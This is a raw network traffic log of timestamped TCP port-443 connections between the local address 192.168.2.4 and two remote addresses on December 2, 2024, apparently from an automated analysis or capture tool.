                                                          Dec 2, 2024 17:57:16.611633062 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.623949051 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.624902964 CET49928443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.624913931 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.626116037 CET49928443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.626121044 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.069114923 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.071471930 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.071580887 CET49928443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.071676970 CET49928443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.071693897 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.071721077 CET49928443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.071727037 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.076220989 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.076268911 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.076401949 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.076762915 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.076776981 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.263835907 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.264553070 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.264590979 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.265059948 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.265064955 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.710376024 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.710396051 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.710460901 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.710494041 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.710715055 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.710721970 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.710737944 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.710794926 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.710887909 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.710920095 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.710958958 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.711219072 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.711232901 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.711833000 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.711838961 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.713968992 CET49934443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.714008093 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:17.714095116 CET49934443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.714237928 CET49934443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:17.714251995 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.077743053 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.078210115 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.078257084 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.078639984 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.078644991 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.198415995 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.198450089 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.198530912 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.198559046 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.198594093 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.200491905 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.200521946 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.200534105 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.200541019 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.203819990 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.203865051 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.203938007 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.204196930 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.204212904 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.459956884 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.460438013 CET49932443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.460464001 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.460885048 CET49932443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.460890055 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.531840086 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.535196066 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.535245895 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.535295010 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.535331011 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.535388947 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.535410881 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.535422087 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.535428047 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.538280010 CET49936443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.538301945 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.538358927 CET49936443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.538497925 CET49936443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.538511992 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.914099932 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.917563915 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.917627096 CET49932443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.917655945 CET49932443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.917673111 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.917684078 CET49932443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.917689085 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.920245886 CET49937443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.920279980 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.920350075 CET49937443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.920476913 CET49937443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.920490980 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.925013065 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.925359964 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.925393105 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:18.925808907 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:18.925815105 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.370805979 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.374207020 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.374253988 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.374265909 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.374315023 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.374361992 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.374381065 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.374391079 CET49933443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.374396086 CET4434993313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.377060890 CET49938443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.377105951 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.377199888 CET49938443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.377356052 CET49938443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.377370119 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.592252016 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.593161106 CET49934443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.593188047 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:19.593641043 CET49934443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:19.593647003 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.046402931 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.049542904 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.049762011 CET49934443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.049798012 CET49934443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.049798012 CET49934443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.049820900 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.049829006 CET4434993413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.055290937 CET49939443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.055330038 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.055463076 CET49939443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.055902004 CET49939443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.055917025 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.066665888 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.067575932 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.067603111 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.068125010 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.068130016 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.417773962 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.418720961 CET49936443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.418747902 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.419106007 CET49936443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.419111013 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.529926062 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.529948950 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.530149937 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.530169964 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.530664921 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.530670881 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.530750990 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.530822039 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.530857086 CET4434993513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.530950069 CET49935443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.535759926 CET49940443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.535785913 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.535932064 CET49940443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.536393881 CET49940443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.536405087 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.696666002 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.697681904 CET49937443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.697695017 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.699146986 CET49937443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.699151993 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.871579885 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.874479055 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.874600887 CET49936443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.874627113 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.874716043 CET49936443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.874905109 CET49936443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.874919891 CET4434993613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.880702019 CET49941443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.880740881 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:20.880867004 CET49941443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.881319046 CET49941443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:20.881334066 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.132528067 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.134771109 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.134835005 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.134862900 CET49937443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.135011911 CET49937443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.135139942 CET49937443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.135159016 CET4434993713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.140919924 CET49942443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.140945911 CET4434994213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.141016960 CET49942443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.141155005 CET49942443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.141164064 CET4434994213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.221892118 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.222917080 CET49938443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.222943068 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.223736048 CET49938443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.223740101 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.677270889 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.680270910 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.680344105 CET49938443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.680385113 CET49938443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.680402040 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.680411100 CET49938443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.680416107 CET4434993813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.683351994 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.683401108 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:21.683480978 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.683615923 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:21.683633089 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.387300968 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.387801886 CET49940443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.387836933 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.388271093 CET49940443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.388278008 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.731571913 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.732712984 CET49941443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.732734919 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.733443975 CET49941443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.733448029 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.842617035 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.845529079 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.845643044 CET49940443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.845743895 CET49940443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.845762014 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.845792055 CET49940443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.845797062 CET4434994013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.850720882 CET49944443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.850766897 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.850853920 CET49944443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.851001978 CET49944443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:22.851016045 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:22.997781992 CET4434994213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.001589060 CET49942443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.001601934 CET4434994213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.002131939 CET49942443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.002135992 CET4434994213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.184715033 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.188108921 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.188154936 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.188201904 CET49941443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.188319921 CET49941443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.188492060 CET49941443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.188507080 CET4434994113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.193959951 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.193993092 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.194125891 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.194484949 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.194499016 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.469918013 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.470746994 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.470773935 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.471204996 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.471214056 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.483629942 CET4434994213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.486500978 CET4434994213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.486608982 CET49942443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.486762047 CET49942443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.486782074 CET4434994213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.491899967 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.491942883 CET4434994613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.492070913 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.492424965 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.492436886 CET4434994613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.919817924 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.922755957 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.922807932 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.922826052 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.922874928 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.922943115 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.922943115 CET49943443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.922986984 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.923012018 CET4434994313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.926069021 CET49947443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.926111937 CET4434994713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:23.926177025 CET49947443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.926322937 CET49947443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:23.926338911 CET4434994713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:24.638223886 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:24.639179945 CET49944443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:24.639210939 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:24.639653921 CET49944443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:24.639662027 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:24.975733995 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:24.976627111 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:24.976653099 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:24.977099895 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:24.977104902 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.046664000 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:25.046716928 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:25.046855927 CET49924443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:57:25.083245993 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.086344004 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.086419106 CET49944443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.086463928 CET49944443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.086463928 CET49944443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.086486101 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.086498022 CET4434994413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.089109898 CET49948443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.089144945 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.089230061 CET49948443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.089376926 CET49948443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.089390993 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.212114096 CET4434994613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.212501049 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.212527037 CET4434994613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.212944984 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.212951899 CET4434994613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.422600985 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.423396111 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.423846960 CET49939443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.423862934 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.424276114 CET49939443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.424280882 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.425566912 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.425614119 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.425627947 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.425677061 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.425726891 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.425744057 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.425770044 CET49945443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.425776005 CET4434994513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.428725958 CET49949443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.428774118 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.428853035 CET49949443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.428993940 CET49949443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.429004908 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.616794109 CET49924443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:57:25.616816998 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:25.708519936 CET4434994713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.709095955 CET49947443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.709110022 CET4434994713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.709434032 CET49947443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.709439039 CET4434994713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.729291916 CET4434994613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.729605913 CET4434994613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.729824066 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.729824066 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.729824066 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.734631062 CET49950443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.734672070 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.734791040 CET49950443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.735229015 CET49950443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.735240936 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.969407082 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.969496965 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.969701052 CET49939443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.969857931 CET49939443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.969875097 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.969888926 CET49939443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.969893932 CET4434993913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.973776102 CET49951443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.973818064 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:25.974059105 CET49951443192.168.2.413.107.246.63
